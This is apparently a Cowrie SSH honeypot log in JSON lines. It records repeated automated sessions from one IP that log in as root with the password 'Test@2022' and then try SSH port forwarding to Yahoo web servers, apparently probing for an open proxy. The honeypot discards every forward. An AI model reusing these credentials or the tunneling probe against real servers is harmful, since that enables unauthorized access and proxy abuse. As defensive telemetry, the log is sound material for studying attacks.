{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:06.341785Z","src_ip":"213.209.150.239","session":"db2246796f8a"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":21404,"dst_ip":"1.2.3.4","dst_port":22,"session":"35b7ea7a8d1a","protocol":"ssh","message":"New connection: 213.209.150.239:21404 (1.2.3.4:22) [session: 35b7ea7a8d1a]","sensor":"my-vps","timestamp":"2025-08-26T01:02:06.397568Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:06.398519Z","src_ip":"213.209.150.239","session":"35b7ea7a8d1a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:06.455281Z","src_ip":"213.209.150.239","session":"35b7ea7a8d1a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:06.738934Z","src_ip":"213.209.150.239","session":"35b7ea7a8d1a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":3634,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:3634","sensor":"my-vps","timestamp":"2025-08-26T01:02:06.796503Z","session":"35b7ea7a8d1a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:06.854205Z","src_ip":"213.209.150.239","session":"35b7ea7a8d1a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":11706,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:11706","sensor":"my-vps","timestamp":"2025-08-26T01:02:07.011414Z","session":"35b7ea7a8d1a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:07.068177Z","src_ip":"213.209.150.239","session":"35b7ea7a8d1a"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:07.125997Z","src_ip":"213.209.150.239","session":"35b7ea7a8d1a"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":21452,"dst_ip":"1.2.3.4","dst_port":22,"session":"a79bb07edcac","protocol":"ssh","message":"New connection: 213.209.150.239:21452 (1.2.3.4:22) [session: a79bb07edcac]","sensor":"my-vps","timestamp":"2025-08-26T01:02:07.181757Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:07.182759Z","src_ip":"213.209.150.239","session":"a79bb07edcac"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:07.239452Z","src_ip":"213.209.150.239","session":"a79bb07edcac"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:07.522424Z","src_ip":"213.209.150.239","session":"a79bb07edcac"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":28674,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:28674","sensor":"my-vps","timestamp":"2025-08-26T01:02:07.580047Z","session":"a79bb07edcac"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:07.636851Z","src_ip":"213.209.150.239","session":"a79bb07edcac"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":9163,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:9163","sensor":"my-vps","timestamp":"2025-08-26T01:02:07.791229Z","session":"a79bb07edcac"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:07.847972Z","src_ip":"213.209.150.239","session":"a79bb07edcac"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:07.905740Z","src_ip":"213.209.150.239","session":"a79bb07edcac"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":21522,"dst_ip":"1.2.3.4","dst_port":22,"session":"d7fbfd093123","protocol":"ssh","message":"New connection: 213.209.150.239:21522 (1.2.3.4:22) [session: d7fbfd093123]","sensor":"my-vps","timestamp":"2025-08-26T01:02:07.951801Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:07.952937Z","src_ip":"213.209.150.239","session":"d7fbfd093123"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:08.000024Z","src_ip":"213.209.150.239","session":"d7fbfd093123"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:08.234933Z","src_ip":"213.209.150.239","session":"d7fbfd093123"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":30592,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:30592","sensor":"my-vps","timestamp":"2025-08-26T01:02:08.282941Z","session":"d7fbfd093123"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:08.330575Z","src_ip":"213.209.150.239","session":"d7fbfd093123"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":25673,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:25673","sensor":"my-vps","timestamp":"2025-08-26T01:02:08.465952Z","session":"d7fbfd093123"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:08.513496Z","src_ip":"213.209.150.239","session":"d7fbfd093123"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:08.561764Z","src_ip":"213.209.150.239","session":"d7fbfd093123"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":21568,"dst_ip":"1.2.3.4","dst_port":22,"session":"44f9bb037c1c","protocol":"ssh","message":"New connection: 213.209.150.239:21568 (1.2.3.4:22) [session: 44f9bb037c1c]","sensor":"my-vps","timestamp":"2025-08-26T01:02:08.617125Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:08.626089Z","src_ip":"213.209.150.239","session":"44f9bb037c1c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:08.674556Z","src_ip":"213.209.150.239","session":"44f9bb037c1c"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:08.956661Z","src_ip":"213.209.150.239","session":"44f9bb037c1c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":24179,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:24179","sensor":"my-vps","timestamp":"2025-08-26T01:02:09.014417Z","session":"44f9bb037c1c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:09.071642Z","src_ip":"213.209.150.239","session":"44f9bb037c1c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":24134,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:24134","sensor":"my-vps","timestamp":"2025-08-26T01:02:09.227191Z","session":"44f9bb037c1c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:09.283754Z","src_ip":"213.209.150.239","session":"44f9bb037c1c"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:09.341114Z","src_ip":"213.209.150.239","session":"44f9bb037c1c"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":21626,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e5be92c8f21","protocol":"ssh","message":"New connection: 213.209.150.239:21626 (1.2.3.4:22) [session: 8e5be92c8f21]","sensor":"my-vps","timestamp":"2025-08-26T01:02:09.396600Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:09.405595Z","src_ip":"213.209.150.239","session":"8e5be92c8f21"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:09.453517Z","src_ip":"213.209.150.239","session":"8e5be92c8f21"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:09.735887Z","src_ip":"213.209.150.239","session":"8e5be92c8f21"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":11411,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:11411","sensor":"my-vps","timestamp":"2025-08-26T01:02:09.794366Z","session":"8e5be92c8f21"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:09.851155Z","src_ip":"213.209.150.239","session":"8e5be92c8f21"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":30826,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:30826","sensor":"my-vps","timestamp":"2025-08-26T01:02:10.007128Z","session":"8e5be92c8f21"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:10.064036Z","src_ip":"213.209.150.239","session":"8e5be92c8f21"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:10.121600Z","src_ip":"213.209.150.239","session":"8e5be92c8f21"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":21678,"dst_ip":"1.2.3.4","dst_port":22,"session":"a211266f3b8b","protocol":"ssh","message":"New connection: 213.209.150.239:21678 (1.2.3.4:22) [session: a211266f3b8b]","sensor":"my-vps","timestamp":"2025-08-26T01:02:10.167938Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:10.168717Z","src_ip":"213.209.150.239","session":"a211266f3b8b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2